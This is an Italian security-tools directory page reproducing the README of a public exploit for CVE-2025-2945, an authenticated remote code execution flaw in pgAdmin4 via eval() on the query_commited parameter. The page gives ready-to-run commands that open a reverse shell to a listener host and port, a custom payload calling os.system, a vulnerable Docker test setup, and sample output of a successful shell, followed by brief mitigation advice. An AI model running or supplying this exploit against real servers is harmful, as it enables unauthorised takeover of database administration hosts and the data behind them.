Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2945 — Exploit per la vulnerabilità di esecuzione remota di codice (RCE) in pgAdmin4 che interessa le versioni dalla 8.10 alla 9.1. | Kitploit
Strumenti/GitHubGitHub/g0d150ne/cve-2025-2945
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubg0d150ne/cve-2025-2945

CVE-2025-2945

Exploit per la vulnerabilità di esecuzione remota di codice (RCE) in pgAdmin4 che interessa le versioni dalla 8.10 alla 9.1.

Vedi Repository
201 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-2945 - Exploit RCE autenticato in pgAdmin4

Autore: G0D150NE
Versione: 2.0.0
CVE: CVE-2025-2945
Gravità: Critica (CVSS 9.9)

📌 Descrizione

Exploit per la vulnerabilità di Remote Code Execution (RCE) in pgAdmin4 che interessa le versioni dalla 8.10 alla 9.1.

La vulnerabilità è presente nell'endpoint /sqleditor/query_tool/download, dove il parametro query_commited viene passato senza sanitizzazione alla funzione eval() di Python, consentendo l'esecuzione di codice arbitrario.

⚡ Funzionalità

  • ✅ Rilevamento automatico della versione
  • ✅ Raccolta del token CSRF da più fonti
  • ✅ Enumerazione degli ID server/gruppo
  • ✅ Payload di reverse shell (codificato in base64)
  • ✅ Supporto payload personalizzati
  • ✅ Modalità debug verbosa
  • ✅ Output console colorato
  • ✅ Bypass della verifica SSL

🚀 Installazione

# Clona o scarica lo script
git clone https://github.com/g0d150ne/CVE-2025-2945
cd CVE-2025-2945

# Installa le dipendenze
pip install requests

🎯 Utilizzo

Utilizzo di base

python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

Con output verboso

python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  -v

Payload personalizzato

python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --custom-payload "__import__('os').system('whoami > /tmp/test.txt')"

Salta il controllo della versione

python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --skip-version-check

📊 Argomenti

Argomento Obbligatorio Descrizione --target-url Sì URL di base di pgAdmin4 (http://RHOST:PORT/) --username Sì Email di accesso a pgAdmin4 --password Sì Password di accesso a pgAdmin4 --db-user Sì Nome utente del database --db-pass Sì Password del database --db-name Sì Nome del database --Rhost Sì IP del listener per la reverse shell --Rport Sì Porta del listener per la reverse shell --max-server-id No ID server massimo da scansionare (default: 10) --skip-version-check No Salta la verifica della versione --custom-payload No Payload Python personalizzato --verbose, -v No Abilita l'output di debug --no-banner No Nascondi il banner

📋 Requisiti

· Python 3.6+ · libreria requests

pip install requests

🧪 Ambiente di test

# Docker con versione vulnerabile di pgAdmin
docker run -d -p 5050:5050 \
  -e [email protected] \
  -e PGADMIN_DEFAULT_PASSWORD=admin123 \
  dpage/pgadmin4:8.10

# Poi esegui l'exploit
python3 poc.py \
  --target-url http://localhost:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

🖥️ Esempio di output

   ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ 
  ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          
  ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌          
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌          
   ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌          
            ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌          ▐░▌▐░▌          
   ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
   ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
   
   CVE-2025-2945 - pgAdmin4 Authenticated RCE
   Author: G0D150NE
   Version: 2.0.0

[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444

🛡️ Mitigazione

· Aggiorna pgAdmin4 alla versione 9.2 o superiore · Limita l'accesso all'interfaccia di pgAdmin · Utilizza credenziali forti · Abilita MFA se disponibile

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. L'utilizzo su sistemi senza autorizzazione esplicita è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.

🔗 Riferimenti

· CVE-2025-2945 · Avviso di sicurezza pgAdmin

📄 Licenza

Licenza MIT

Scarica lo strumento